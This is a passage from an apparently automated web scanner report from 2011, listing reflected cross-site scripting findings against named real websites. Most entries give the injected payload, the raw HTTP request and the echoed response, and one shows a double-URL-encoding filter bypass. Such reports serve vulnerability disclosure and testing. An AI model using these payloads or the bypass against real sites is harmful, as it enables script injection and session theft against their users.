<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4257a"-alert(1)-"d960cce6c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4257a"-alert(1)-"d960cce6c75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 13:34:25 +0000
ETag: "1301751265"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1769286479
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:34:26 GMT
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/4257a"-alert(1)-"d960cce6c75";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 was submitted in the REST URL parameter 1. This input was echoed as e0c3e';alert(1)//0eb65c39a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icoe0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:26:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6783630;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: CFTOKEN=43948287;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: JSESSIONID=c230d0ddc76e41291cab3c2c7e2138772567;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.icoe0c3e';alert(1)//0eb65c39a2=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   fun
...[SNIP]...

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4174f'%3balert(1)//b235c779868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4174f';alert(1)//b235c779868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4174f'%3balert(1)//b235c779868=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56390739;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: CFTOKEN=78178525;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: JSESSIONID=8030c0b06e9348c9e386246d2c3415127262;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
;
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.ico?4174f';alert(1)//b235c779868=1=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   f
...[SNIP]...

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506b0"-alert(1)-"3c6201fb7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=21707428;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: CFTOKEN=48294501;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: JSESSIONID=f4308d3d1a40fd31ab3b9122d75b4ba1b687;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:"6035818",
c3:"6035818",
c4:"http://www.mayoclinic.com/invoke.cfm?b404=1?404;http://www.mayoclinic.com:80/favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f883"><script>alert(1)</script>a6bf2b66203 was submitted in the REST URL parameter 1. This input was echoed as 3f883\"><script>alert(1)</script>a6bf2b66203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f883"><script>alert(1)</script>a6bf2b66203 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=3qrq02pgj5elgfbk68038olr35; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:18:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
<form method="post" action="http://www.mediaite.com/favicon.ico3f883\"><script>alert(1)</script>a6bf2b66203/?_login=25c119c94d">
...[SNIP]...

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><script>alert(1)</script>c2b107df494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6b98"><script>alert(1)</script>c2b107df494 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsGU2XK3CFuGIzAy+8Ag==; expires=Sun, 01-Apr-12 13:58:08 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="returnurl" value="/favicon.icob6b98"><script>alert(1)</script>c2b107df494" />
...[SNIP]...

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34891</script><script>alert(1)</script>e1ff6838de9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34891</script><script>alert(1)</script>e1ff6838de9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsK02XK35zo0P8Azz5Ag==; expires=Sun, 01-Apr-12 13:58:22 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
_dadanet.registerStartup(
['classes/FormManager', 'classes/CommObjects'],
function()
{
var co_opts = {


uri: 'http://www.motime.com/favicon.ico34891</script><script>alert(1)</script>e1ff6838de9',
dict:{
'op_in_progress_desc': '',
'is_friend': 'We are friends',
'invite_already_send': 'Invite already sent',
'invite_send': 'Invitation sent',
'invite_blocked': 'Invites blocked by user',
'is_fan'
...[SNIP]...

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cb45a<script>alert(1)</script>f364086cc64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb45a<script>alert(1)</script>f364086cc64 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /favicon.icocb45a<script>alert(1)</script>f364086cc64 not found!</h1>
...[SNIP]...

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd99"><script>alert(1)</script>c02e519161c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodcd99"><script>alert(1)</script>c02e519161c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/favicon.icodcd99"><script>alert(1)</script>c02e519161c', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8634e</script><script>alert(1)</script>11bc3873d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=ee713ae5dfb322af6abdeece0ada1b4e; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
pe="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255ec'%3b8d549cf0020 was submitted in the REST URL parameter 1. This input was echoed as 255ec';8d549cf0020 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /255ec'%3b8d549cf0020 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:36:40 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/255ec'%3b8d549cf0020
RealServer: prodweb4
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:36:42 GMT
Date: Sat, 02 Apr 2011 13:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript">refresh_rate = 1;
hbx_ad_refresh_page = 'index';
hbx_ad_refresh_apath = '_255ec';8d549cf0020';</script>
...[SNIP]...

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d9"><a>3ddeb7ae6ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /175d9"><a>3ddeb7ae6ca HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:35:32 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/175d9"><a>3ddeb7ae6ca
Realserver: prodweb12
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:35 GMT
Date: Sat, 02 Apr 2011 13:35:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src="http://pixel.quantserve.com/pixel/p-84eTroxoNX3JE.gif?labels=MYLT:175d9"><a>3ddeb7ae6ca" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
...[SNIP]...

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3df4'%3balert(1)//2457915afd7 was submitted in the REST URL parameter 1. This input was echoed as c3df4';alert(1)//2457915afd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc3df4'%3balert(1)//2457915afd7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:42 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 71163
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:24:23 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.icoc3df4';alert(1)//2457915afd7';
}
//-->
...[SNIP]...

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee3e"-alert(1)-"d0aa2d773ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodee3e"-alert(1)-"d0aa2d773ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:48 GMT
Content-Length: 23641
Connection: close
Set-Cookie: otu=f0124679080472be32101e034bba68c0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=c3f05fa9a6a425c696068891ef99e4ef; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMkY4MTExRTREOTcyNjcw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds favicon.icodee3e"-alert(1)-"d0aa2d773ae","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141c5"><script>alert(1)</script>d6b037b25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico141c5"><script>alert(1)</script>d6b037b25fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:47 GMT
Content-Length: 23718
Connection: close
Set-Cookie: otu=4d4e452f05e3458af8c7091581577bcf; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=f396da894437be11c53e9aafdb5d3381; path=/; domain=.oodle.com
Set-Cookie: a=dT1BNUUwMDhCMDREOTcyNjZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/favicon.ico141c5"><script>alert(1)</script>d6b037b25fc" />
...[SNIP]...

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c04d7'><script>alert(1)</script>f4fdd867ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90396


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0' property='og:url'/>
...[SNIP]...

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee0cd'%3bcb0a88443c6 was submitted in the REST URL parameter 1. This input was echoed as ee0cd';cb0a88443c6 in the application's response.

